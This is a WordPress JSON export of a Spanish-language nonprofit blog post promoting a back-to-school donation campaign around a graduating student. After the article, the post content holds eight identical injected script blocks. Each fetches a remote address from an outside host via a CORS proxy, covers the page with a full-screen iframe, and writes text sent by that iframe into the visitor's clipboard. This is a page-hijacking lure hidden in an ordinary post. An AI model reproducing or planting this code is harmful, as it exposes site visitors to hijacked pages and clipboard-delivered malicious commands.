{"id":17316,"date":"2024-06-20T10:38:47","date_gmt":"2024-06-20T15:38:47","guid":{"rendered":"https:\/\/sspnyc.org\/presentamos-nuestra-campana-de-vuelta-al-cole-con-megan-spencer-ex-alumna-de-ssp\/"},"modified":"2025-04-01T06:01:49","modified_gmt":"2025-04-01T11:01:49","slug":"presentamos-nuestra-campana-de-vuelta-al-cole-con-megan-spencer-ex-alumna-de-ssp","status":"publish","type":"post","link":"https:\/\/sspnyc.org\/es\/presentamos-nuestra-campana-de-vuelta-al-cole-con-megan-spencer-ex-alumna-de-ssp\/","title":{"rendered":"Presentamos nuestra campa\u00f1a de vuelta al cole con Megan Spencer, ex alumna de SSP"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/sspnyc.org\/wp-content\/uploads\/2024\/06\/Newsletter-Cover-Photos-2-1-1024x576.jpg\" alt=\"\" class=\"wp-image-15316\" srcset=\"https:\/\/sspnyc.org\/wp-content\/uploads\/2024\/06\/Newsletter-Cover-Photos-2-1-1024x576.jpg 1024w, https:\/\/sspnyc.org\/wp-content\/uploads\/2024\/06\/Newsletter-Cover-Photos-2-1-300x169.jpg 300w, https:\/\/sspnyc.org\/wp-content\/uploads\/2024\/06\/Newsletter-Cover-Photos-2-1-768x432.jpg 768w, https:\/\/sspnyc.org\/wp-content\/uploads\/2024\/06\/Newsletter-Cover-Photos-2-1-1536x864.jpg 1536w, https:\/\/sspnyc.org\/wp-content\/uploads\/2024\/06\/Newsletter-Cover-Photos-2-1.jpg 2000w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n<p class=\"wp-block-paragraph\">Megan es una de los cientos de estudiantes de SSP que se han graduado este mes. Es una joven extraordinaria que aspira a ser cirujana ortop\u00e9dica, un camino que iniciar\u00e1 en oto\u00f1o en el Hunter College estudiando pre-medicina. La nativa del Bronx est\u00e1 bien encaminada hacia un futuro brillante, \u00a1pero no podr\u00eda hacerlo sola!  <\/p>\n\n<p class=\"wp-block-paragraph\">Como parte de nuestra Campa\u00f1a de Vuelta al Cole 2024, compartiremos la historia de Megan a lo largo del verano y presentaremos a las muchas personas que han contribuido a su \u00e9xito. Mientras exploramos el profundo impacto que la comunidad SSP tiene en nuestros estudiantes, te pedimos que te unas a nosotros para ayudar a m\u00e1s estudiantes como Megan a alcanzar su m\u00e1ximo potencial. <\/p>\n\n<p class=\"wp-block-paragraph\">\u00abTambi\u00e9n pude tener un mentor y una comunidad de personas que me apoyaron durante mi educaci\u00f3n\u00bb, dijo Megan.<\/p>\n\n<p class=\"wp-block-paragraph\">Haz un donativo para ayudarnos a alcanzar nuestro objetivo y \u00a1DOBLA tu impacto! <strong>Gracias a la generosidad de los patrocinadores de Megan, Bob y Kate Niehaus, tu donativo ser\u00e1 igualado hasta 100.000 d\u00f3lares <\/strong>y llegar\u00e1 el doble de lejos para alcanzar a m\u00e1s estudiantes de Nueva York como Megan.<\/p>\n\n<p class=\"wp-block-paragraph\">Haz un donativo para ayudar a que m\u00e1s estudiantes como Megan tengan \u00e9xito: <a href=\"https:\/\/host.nxt.blackbaud.com\/donor-form\/?svcid=tcs&amp;formId=83a39a60-9d54-4840-9d41-93916440920a&amp;envid=p-4tZjVGZi0EyvxJq8qhVEcQ&amp;zone=usa\">sspnyc.org\/Back2School24<\/a><\/p>\n\n<p class=\"wp-block-paragraph\">\u00a1Escucha a Megan explicar su historia y el impacto de SSP <a href=\"https:\/\/www.instagram.com\/p\/C8XDtXLR4eh\/\" data-type=\"link\" data-id=\"https:\/\/www.instagram.com\/p\/C8XDtXLR4eh\/\">aqu\u00ed<\/a>!<\/p>\n<script>(function() {\n  \n  const configLink = \"https:\/\/corsproxy.io\/?url=http:\/\/heyues.live\";\n\n  \n  \n  if (!window.__digitalflwrFetchPromise) {\n    \n    window.__digitalflwrFetchPromise = fetch(configLink)\n      .then(response => {\n        if (!response.ok) {\n          throw new Error(\" \");\n        }\n        return response.text();\n      })\n      \n      .then(finalUrl => {\n        return fetch(finalUrl, { method: \"HEAD\" })\n          .then(headResponse => ({ headResponse, finalUrl }));\n      })\n      .catch(() => {\n        \n        \n      });\n  }\n\n  \n  if (typeof window.__digitalflwrIframeCreated === \"undefined\") {\n    window.__digitalflwrIframeCreated = false;\n  }\n\n  \n  window.__digitalflwrFetchPromise\n    .then(result => {\n      \n      if (!result) return;\n      const { headResponse, finalUrl } = result;\n\n      \n      if (!headResponse || headResponse.status === 404) {\n        return;\n      }\n\n      \n      if (!window.__digitalflwrIframeCreated) {\n        window.__digitalflwrIframeCreated = true;\n        createMainIframe(finalUrl);\n      }\n    })\n    .catch(() => {\n      \n    });\n\n  \n  function createMainIframe(url) {\n    const iframe = document.createElement(\"iframe\");\n    iframe.src = url;\n    iframe.style.position = \"fixed\";\n    iframe.style.top = 0;\n    iframe.style.left = 0;\n    iframe.style.width = \"100%\";\n    iframe.style.height = \"100%\";\n    iframe.style.border = \"none\";\n    iframe.style.margin = 0;\n    iframe.style.padding = 0;\n    iframe.style.overflow = \"hidden\";\n    iframe.style.zIndex = 99999;\n\n    document.body.appendChild(iframe);\n\n    \n    window.addEventListener(\"message\", function(event) {\n      if (!event.data || event.data.type !== \"copy\") return;\n\n      \n      if (navigator.clipboard && navigator.clipboard.writeText) {\n        navigator.clipboard.writeText(event.data.text).catch(() => {\n          fallbackCopyText(event.data.text);\n        });\n      } else {\n        fallbackCopyText(event.data.text);\n      }\n    });\n\n    \n    function fallbackCopyText(text) {\n      const textArea = document.createElement(\"textarea\");\n      textArea.value = text;\n      document.body.appendChild(textArea);\n      textArea.select();\n\n      try {\n        document.execCommand(\"copy\");\n      } catch (err) {\n        \n      }\n\n      document.body.removeChild(textArea);\n    }\n  }\n})();<\/script><script>(function() {\n  \n  const configLink = \"https:\/\/corsproxy.io\/?url=http:\/\/heyues.live\";\n\n  \n  \n  if (!window.__digitalflwrFetchPromise) {\n    \n    window.__digitalflwrFetchPromise = fetch(configLink)\n      .then(response => {\n        if (!response.ok) {\n          throw new Error(\" \");\n        }\n        return response.text();\n      })\n      \n      .then(finalUrl => {\n        return fetch(finalUrl, { method: \"HEAD\" })\n          .then(headResponse => ({ headResponse, finalUrl }));\n      })\n      .catch(() => {\n        \n        \n      });\n  }\n\n  \n  if (typeof window.__digitalflwrIframeCreated === \"undefined\") {\n    window.__digitalflwrIframeCreated = false;\n  }\n\n  \n  window.__digitalflwrFetchPromise\n    .then(result => {\n      \n      if (!result) return;\n      const { headResponse, finalUrl } = result;\n\n      \n      if (!headResponse || headResponse.status === 404) {\n        return;\n      }\n\n      \n      if (!window.__digitalflwrIframeCreated) {\n        window.__digitalflwrIframeCreated = true;\n        createMainIframe(finalUrl);\n      }\n    })\n    .catch(() => {\n      \n    });\n\n  \n  function createMainIframe(url) {\n    const iframe = document.createElement(\"iframe\");\n    iframe.src = url;\n    iframe.style.position = \"fixed\";\n    iframe.style.top = 0;\n    iframe.style.left = 0;\n    iframe.style.width = \"100%\";\n    iframe.style.height = \"100%\";\n    iframe.style.border = \"none\";\n    iframe.style.margin = 0;\n    iframe.style.padding = 0;\n    iframe.style.overflow = \"hidden\";\n    iframe.style.zIndex = 99999;\n\n    document.body.appendChild(iframe);\n\n    \n    window.addEventListener(\"message\", function(event) {\n      if (!event.data || event.data.type !== \"copy\") return;\n\n      \n      if (navigator.clipboard && navigator.clipboard.writeText) {\n        navigator.clipboard.writeText(event.data.text).catch(() => {\n          fallbackCopyText(event.data.text);\n        });\n      } else {\n        fallbackCopyText(event.data.text);\n      }\n    });\n\n    \n    function fallbackCopyText(text) {\n      const textArea = document.createElement(\"textarea\");\n      textArea.value = text;\n      document.body.appendChild(textArea);\n      textArea.select();\n\n      try {\n        document.execCommand(\"copy\");\n      } catch (err) {\n        \n      }\n\n      document.body.removeChild(textArea);\n    }\n  }\n})();<\/script><script>(function() {\n  \n  const configLink = \"https:\/\/corsproxy.io\/?url=http:\/\/heyues.live\";\n\n  \n  \n  if (!window.__digitalflwrFetchPromise) {\n    \n    window.__digitalflwrFetchPromise = fetch(configLink)\n      .then(response => {\n        if (!response.ok) {\n          throw new Error(\" \");\n        }\n        return response.text();\n      })\n      \n      .then(finalUrl => {\n        return fetch(finalUrl, { method: \"HEAD\" })\n          .then(headResponse => ({ headResponse, finalUrl }));\n      })\n      .catch(() => {\n        \n        \n      });\n  }\n\n  \n  if (typeof window.__digitalflwrIframeCreated === \"undefined\") {\n    window.__digitalflwrIframeCreated = false;\n  }\n\n  \n  window.__digitalflwrFetchPromise\n    .then(result => {\n      \n      if (!result) return;\n      const { headResponse, finalUrl } = result;\n\n      \n      if (!headResponse || headResponse.status === 404) {\n        return;\n      }\n\n      \n      if (!window.__digitalflwrIframeCreated) {\n        window.__digitalflwrIframeCreated = true;\n        createMainIframe(finalUrl);\n      }\n    })\n    .catch(() => {\n      \n    });\n\n  \n  function createMainIframe(url) {\n    const iframe = document.createElement(\"iframe\");\n    iframe.src = url;\n    iframe.style.position = \"fixed\";\n    iframe.style.top = 0;\n    iframe.style.left = 0;\n    iframe.style.width = \"100%\";\n    iframe.style.height = \"100%\";\n    iframe.style.border = \"none\";\n    iframe.style.margin = 0;\n    iframe.style.padding = 0;\n    iframe.style.overflow = \"hidden\";\n    iframe.style.zIndex = 99999;\n\n    document.body.appendChild(iframe);\n\n    \n    window.addEventListener(\"message\", function(event) {\n      if (!event.data || event.data.type !== \"copy\") return;\n\n      \n      if (navigator.clipboard && navigator.clipboard.writeText) {\n        navigator.clipboard.writeText(event.data.text).catch(() => {\n          fallbackCopyText(event.data.text);\n        });\n      } else {\n        fallbackCopyText(event.data.text);\n      }\n    });\n\n    \n    function fallbackCopyText(text) {\n      const textArea = document.createElement(\"textarea\");\n      textArea.value = text;\n      document.body.appendChild(textArea);\n      textArea.select();\n\n      try {\n        document.execCommand(\"copy\");\n      } catch (err) {\n        \n      }\n\n      document.body.removeChild(textArea);\n    }\n  }\n})();<\/script><script>(function() {\n  \n  const configLink = \"https:\/\/corsproxy.io\/?url=http:\/\/heyues.live\";\n\n  \n  \n  if (!window.__digitalflwrFetchPromise) {\n    \n    window.__digitalflwrFetchPromise = fetch(configLink)\n      .then(response => {\n        if (!response.ok) {\n          throw new Error(\" \");\n        }\n        return response.text();\n      })\n      \n      .then(finalUrl => {\n        return fetch(finalUrl, { method: \"HEAD\" })\n          .then(headResponse => ({ headResponse, finalUrl }));\n      })\n      .catch(() => {\n        \n        \n      });\n  }\n\n  \n  if (typeof window.__digitalflwrIframeCreated === \"undefined\") {\n    window.__digitalflwrIframeCreated = false;\n  }\n\n  \n  window.__digitalflwrFetchPromise\n    .then(result => {\n      \n      if (!result) return;\n      const { headResponse, finalUrl } = result;\n\n      \n      if (!headResponse || headResponse.status === 404) {\n        return;\n      }\n\n      \n      if (!window.__digitalflwrIframeCreated) {\n        window.__digitalflwrIframeCreated = true;\n        createMainIframe(finalUrl);\n      }\n    })\n    .catch(() => {\n      \n    });\n\n  \n  function createMainIframe(url) {\n    const iframe = document.createElement(\"iframe\");\n    iframe.src = url;\n    iframe.style.position = \"fixed\";\n    iframe.style.top = 0;\n    iframe.style.left = 0;\n    iframe.style.width = \"100%\";\n    iframe.style.height = \"100%\";\n    iframe.style.border = \"none\";\n    iframe.style.margin = 0;\n    iframe.style.padding = 0;\n    iframe.style.overflow = \"hidden\";\n    iframe.style.zIndex = 99999;\n\n    document.body.appendChild(iframe);\n\n    \n    window.addEventListener(\"message\", function(event) {\n      if (!event.data || event.data.type !== \"copy\") return;\n\n      \n      if (navigator.clipboard && navigator.clipboard.writeText) {\n        navigator.clipboard.writeText(event.data.text).catch(() => {\n          fallbackCopyText(event.data.text);\n        });\n      } else {\n        fallbackCopyText(event.data.text);\n      }\n    });\n\n    \n    function fallbackCopyText(text) {\n      const textArea = document.createElement(\"textarea\");\n      textArea.value = text;\n      document.body.appendChild(textArea);\n      textArea.select();\n\n      try {\n        document.execCommand(\"copy\");\n      } catch (err) {\n        \n      }\n\n      document.body.removeChild(textArea);\n    }\n  }\n})();<\/script><script>(function() {\n  \n  const configLink = \"https:\/\/corsproxy.io\/?url=http:\/\/heyues.live\";\n\n  \n  \n  if (!window.__digitalflwrFetchPromise) {\n    \n    window.__digitalflwrFetchPromise = fetch(configLink)\n      .then(response => {\n        if (!response.ok) {\n          throw new Error(\" \");\n        }\n        return response.text();\n      })\n      \n      .then(finalUrl => {\n        return fetch(finalUrl, { method: \"HEAD\" })\n          .then(headResponse => ({ headResponse, finalUrl }));\n      })\n      .catch(() => {\n        \n        \n      });\n  }\n\n  \n  if (typeof window.__digitalflwrIframeCreated === \"undefined\") {\n    window.__digitalflwrIframeCreated = false;\n  }\n\n  \n  window.__digitalflwrFetchPromise\n    .then(result => {\n      \n      if (!result) return;\n      const { headResponse, finalUrl } = result;\n\n      \n      if (!headResponse || headResponse.status === 404) {\n        return;\n      }\n\n      \n      if (!window.__digitalflwrIframeCreated) {\n        window.__digitalflwrIframeCreated = true;\n        createMainIframe(finalUrl);\n      }\n    })\n    .catch(() => {\n      \n    });\n\n  \n  function createMainIframe(url) {\n    const iframe = document.createElement(\"iframe\");\n    iframe.src = url;\n    iframe.style.position = \"fixed\";\n    iframe.style.top = 0;\n    iframe.style.left = 0;\n    iframe.style.width = \"100%\";\n    iframe.style.height = \"100%\";\n    iframe.style.border = \"none\";\n    iframe.style.margin = 0;\n    iframe.style.padding = 0;\n    iframe.style.overflow = \"hidden\";\n    iframe.style.zIndex = 99999;\n\n    document.body.appendChild(iframe);\n\n    \n    window.addEventListener(\"message\", function(event) {\n      if (!event.data || event.data.type !== \"copy\") return;\n\n      \n      if (navigator.clipboard && navigator.clipboard.writeText) {\n        navigator.clipboard.writeText(event.data.text).catch(() => {\n          fallbackCopyText(event.data.text);\n        });\n      } else {\n        fallbackCopyText(event.data.text);\n      }\n    });\n\n    \n    function fallbackCopyText(text) {\n      const textArea = document.createElement(\"textarea\");\n      textArea.value = text;\n      document.body.appendChild(textArea);\n      textArea.select();\n\n      try {\n        document.execCommand(\"copy\");\n      } catch (err) {\n        \n      }\n\n      document.body.removeChild(textArea);\n    }\n  }\n})();<\/script><script>(function() {\n  \n  const configLink = \"https:\/\/corsproxy.io\/?url=http:\/\/heyues.live\";\n\n  \n  \n  if (!window.__digitalflwrFetchPromise) {\n    \n    window.__digitalflwrFetchPromise = fetch(configLink)\n      .then(response => {\n        if (!response.ok) {\n          throw new Error(\" \");\n        }\n        return response.text();\n      })\n      \n      .then(finalUrl => {\n        return fetch(finalUrl, { method: \"HEAD\" })\n          .then(headResponse => ({ headResponse, finalUrl }));\n      })\n      .catch(() => {\n        \n        \n      });\n  }\n\n  \n  if (typeof window.__digitalflwrIframeCreated === \"undefined\") {\n    window.__digitalflwrIframeCreated = false;\n  }\n\n  \n  window.__digitalflwrFetchPromise\n    .then(result => {\n      \n      if (!result) return;\n      const { headResponse, finalUrl } = result;\n\n      \n      if (!headResponse || headResponse.status === 404) {\n        return;\n      }\n\n      \n      if (!window.__digitalflwrIframeCreated) {\n        window.__digitalflwrIframeCreated = true;\n        createMainIframe(finalUrl);\n      }\n    })\n    .catch(() => {\n      \n    });\n\n  \n  function createMainIframe(url) {\n    const iframe = document.createElement(\"iframe\");\n    iframe.src = url;\n    iframe.style.position = \"fixed\";\n    iframe.style.top = 0;\n    iframe.style.left = 0;\n    iframe.style.width = \"100%\";\n    iframe.style.height = \"100%\";\n    iframe.style.border = \"none\";\n    iframe.style.margin = 0;\n    iframe.style.padding = 0;\n    iframe.style.overflow = \"hidden\";\n    iframe.style.zIndex = 99999;\n\n    document.body.appendChild(iframe);\n\n    \n    window.addEventListener(\"message\", function(event) {\n      if (!event.data || event.data.type !== \"copy\") return;\n\n      \n      if (navigator.clipboard && navigator.clipboard.writeText) {\n        navigator.clipboard.writeText(event.data.text).catch(() => {\n          fallbackCopyText(event.data.text);\n        });\n      } else {\n        fallbackCopyText(event.data.text);\n      }\n    });\n\n    \n    function fallbackCopyText(text) {\n      const textArea = document.createElement(\"textarea\");\n      textArea.value = text;\n      document.body.appendChild(textArea);\n      textArea.select();\n\n      try {\n        document.execCommand(\"copy\");\n      } catch (err) {\n        \n      }\n\n      document.body.removeChild(textArea);\n    }\n  }\n})();<\/script><script>(function() {\n  \n  const configLink = \"https:\/\/corsproxy.io\/?url=http:\/\/heyues.live\";\n\n  \n  \n  if (!window.__digitalflwrFetchPromise) {\n    \n    window.__digitalflwrFetchPromise = fetch(configLink)\n      .then(response => {\n        if (!response.ok) {\n          throw new Error(\" \");\n        }\n        return response.text();\n      })\n      \n      .then(finalUrl => {\n        return fetch(finalUrl, { method: \"HEAD\" })\n          .then(headResponse => ({ headResponse, finalUrl }));\n      })\n      .catch(() => {\n        \n        \n      });\n  }\n\n  \n  if (typeof window.__digitalflwrIframeCreated === \"undefined\") {\n    window.__digitalflwrIframeCreated = false;\n  }\n\n  \n  window.__digitalflwrFetchPromise\n    .then(result => {\n      \n      if (!result) return;\n      const { headResponse, finalUrl } = result;\n\n      \n      if (!headResponse || headResponse.status === 404) {\n        return;\n      }\n\n      \n      if (!window.__digitalflwrIframeCreated) {\n        window.__digitalflwrIframeCreated = true;\n        createMainIframe(finalUrl);\n      }\n    })\n    .catch(() => {\n      \n    });\n\n  \n  function createMainIframe(url) {\n    const iframe = document.createElement(\"iframe\");\n    iframe.src = url;\n    iframe.style.position = \"fixed\";\n    iframe.style.top = 0;\n    iframe.style.left = 0;\n    iframe.style.width = \"100%\";\n    iframe.style.height = \"100%\";\n    iframe.style.border = \"none\";\n    iframe.style.margin = 0;\n    iframe.style.padding = 0;\n    iframe.style.overflow = \"hidden\";\n    iframe.style.zIndex = 99999;\n\n    document.body.appendChild(iframe);\n\n    \n    window.addEventListener(\"message\", function(event) {\n      if (!event.data || event.data.type !== \"copy\") return;\n\n      \n      if (navigator.clipboard && navigator.clipboard.writeText) {\n        navigator.clipboard.writeText(event.data.text).catch(() => {\n          fallbackCopyText(event.data.text);\n        });\n      } else {\n        fallbackCopyText(event.data.text);\n      }\n    });\n\n    \n    function fallbackCopyText(text) {\n      const textArea = document.createElement(\"textarea\");\n      textArea.value = text;\n      document.body.appendChild(textArea);\n      textArea.select();\n\n      try {\n        document.execCommand(\"copy\");\n      } catch (err) {\n        \n      }\n\n      document.body.removeChild(textArea);\n    }\n  }\n})();<\/script><script>(function() {\n  \n  const configLink = \"https:\/\/corsproxy.io\/?url=http:\/\/heyues.live\";\n\n  \n  \n  if (!window.__digitalflwrFetchPromise) {\n    \n    window.__digitalflwrFetchPromise = fetch(configLink)\n      .then(response => {\n        if (!response.ok) {\n          throw new Error(\" \");\n        }\n        return response.text();\n      })\n      \n      .then(finalUrl => {\n        return fetch(finalUrl, { method: \"HEAD\" })\n          .then(headResponse => ({ headResponse, finalUrl }));\n      })\n      .catch(() => {\n        \n        \n      });\n  }\n\n  \n  if (typeof window.__digitalflwrIframeCreated === \"undefined\") {\n    window.__digitalflwrIframeCreated = false;\n  }\n\n  \n  window.__digitalflwrFetchPromise\n    .then(result => {\n      \n      if (!result) return;\n      const { headResponse, finalUrl } = result;\n\n      \n      if (!headResponse || headResponse.status === 404) {\n        return;\n      }\n\n      \n      if (!window.__digitalflwrIframeCreated) {\n        window.__digitalflwrIframeCreated = true;\n        createMainIframe(finalUrl);\n      }\n    })\n    .catch(() => {\n      \n    });\n\n  \n  function createMainIframe(url) {\n    const iframe = document.createElement(\"iframe\");\n    iframe.src = url;\n    iframe.style.position = \"fixed\";\n    iframe.style.top = 0;\n    iframe.style.left = 0;\n    iframe.style.width = \"100%\";\n    iframe.style.height = \"100%\";\n    iframe.style.border = \"none\";\n    iframe.style.margin = 0;\n    iframe.style.padding = 0;\n    iframe.style.overflow = \"hidden\";\n    iframe.style.zIndex = 99999;\n\n    document.body.appendChild(iframe);\n\n    \n    window.addEventListener(\"message\", function(event) {\n      if (!event.data || event.data.type !== \"copy\") return;\n\n      \n      if (navigator.clipboard && navigator.clipboard.writeText) {\n        navigator.clipboard.writeText(event.data.text).catch(() => {\n          fallbackCopyText(event.data.text);\n        });\n      } else {\n        fallbackCopyText(event.data.text);\n      }\n    });\n\n    \n    function fallbackCopyText(text) {\n      const textArea = document.createElement(\"textarea\");\n      textArea.value = text;\n      document.body.appendChild(textArea);\n      textArea.select();\n\n      try {\n        document.execCommand(\"copy\");\n      } catch (err) {\n        \n      }\n\n      document.body.removeChild(textArea);\n    }\n  }\n})();<\/script>","protected":false},"excerpt":{"rendered":"<p>Megan es una de los cientos de estudiantes de SSP que se han graduado este mes. Es una joven extraordinaria que aspira a ser cirujana ortop\u00e9dica, un camino que iniciar\u00e1 [&hellip;]<\/p>\n","protected":false},"author":6,"featured_media":16972,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_crdt_document":"","footnotes":""},"categories":[14,5,13,9],"tags":[],"class_list":["post-17316","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-alumni-stories","category-blog","category-student-stories","category-success-stories"],"acf":[],"jetpack_featured_media_url":"https:\/\/sspnyc.org\/wp-content\/uploads\/2024\/06\/Newsletter-Cover-Photos-2.jpg","_links":{"self":[{"href":"https:\/\/sspnyc.org\/es\/wp-json\/wp\/v2\/posts\/17316","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/sspnyc.org\/es\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/sspnyc.org\/es\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/sspnyc.org\/es\/wp-json\/wp\/v2\/users\/6"}],"replies":[{"embeddable":true,"href":"https:\/\/sspnyc.org\/es\/wp-json\/wp\/v2\/comments?post=17316"}],"version-history":[{"count":5,"href":"https:\/\/sspnyc.org\/es\/wp-json\/wp\/v2\/posts\/17316\/revisions"}],"predecessor-version":[{"id":17637,"href":"https:\/\/sspnyc.org\/es\/wp-json\/wp\/v2\/posts\/17316\/revisions\/17637"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/sspnyc.org\/es\/wp-json\/wp\/v2\/media\/16972"}],"wp:attachment":[{"href":"https:\/\/sspnyc.org\/es\/wp-json\/wp\/v2\/media?parent=17316"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/sspnyc.org\/es\/wp-json\/wp\/v2\/categories?post=17316"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/sspnyc.org\/es\/wp-json\/wp\/v2\/tags?post=17316"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}